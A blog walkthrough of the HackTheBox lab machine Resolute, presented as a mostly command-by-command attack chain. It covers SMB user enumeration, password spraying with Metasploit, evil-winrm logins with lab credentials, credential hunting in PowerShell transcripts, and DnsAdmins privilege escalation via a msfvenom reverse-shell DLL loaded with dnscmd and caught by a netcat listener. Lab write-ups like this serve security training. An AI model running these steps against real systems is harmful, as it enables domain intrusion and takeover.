hackthebox

HackTheBox - Resolute | Walkthrough

Abhinav Gyawali

2 min read
HackTheBox - Resolute | Walkthrough

Recon

nmap -A 10.10.10.169

enum4linux 10.10.10.169 > enum

cat enum | grep "Account:"

You should see some accounts and some creds
Make a user list from it

cat enum | grep "Account:" | cut -d " " -f8 > user_list

msfconsole
search smb_login
use auxiliary/scanner/smb/smb_login
options
set RHOSTS 10.10.10.169
set SMBPass 'Welcome123!'
set USER_FILE ~/HTB/Resolute/user_list
run

You should see that it works for one user, melanie.

User

Now, let's use evil-winrm to see if we can get a shell

cd ~/HTB/Resolute/
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm/

ruby evil-winrm.rb -> It gives an error, we need some dependencies first

cat Gemfile -> checking for dependencies

gem install winrm winrm-fs colorize stringio

ruby evil-winrm.rb -> shows a help menu

ruby evil-winrm.rb -u melanie -p 'Welcome123!' -i 10.10.10.169

You should get a shell!

User 2

cd ..
type Desktop\user.txt

Now,

cd C:\
dir -h
cd PSTranscripts
dir -h
cd 20191203
type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt

You should get the creds of another user, Ryan
make a new file creds and save it there, it might come in handy later

ruby evil-winrm.rb -u ryan -p Serv3rAdmin4cc123! -i 10.10.10.169

Administrator

whoami /all

Now, I really recommend you check my another blog post regarding this privesc process as it is way more detailed than this: https://abhizer.com/windows-privilege-escalation-dnsadmin-to-domaincontroller/

We can see that he is a member of DNSAdmin group
Googling about it tells us about a vulnerability, dns injection, that we can use to privilege escalate.

in another terminal tab,

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.155 LPORT=4444 --platform=windows -f dll > ~/HTB/Resolute/share/plugin.dll

cd /usr/share/doc/python3-impacket/examples
./smbserver.py SHARE ~/HTB/Resolute/share/

And in another tab, set up a netcat listener:
nc -nvlp 4444

Now, in the windows machine,

dnscmd.exe Resolute.megabank.local /config /serverlevelplugindll \\10.10.15.155\share\plugin.dll

sc.exe stop dns
sc.exe start dns

Now, you should get a reverse shell in your netcat listener!

type C:\Users\Administrator\Desktop\root.txt

Sign up for more like this.

Enter your email
Subscribe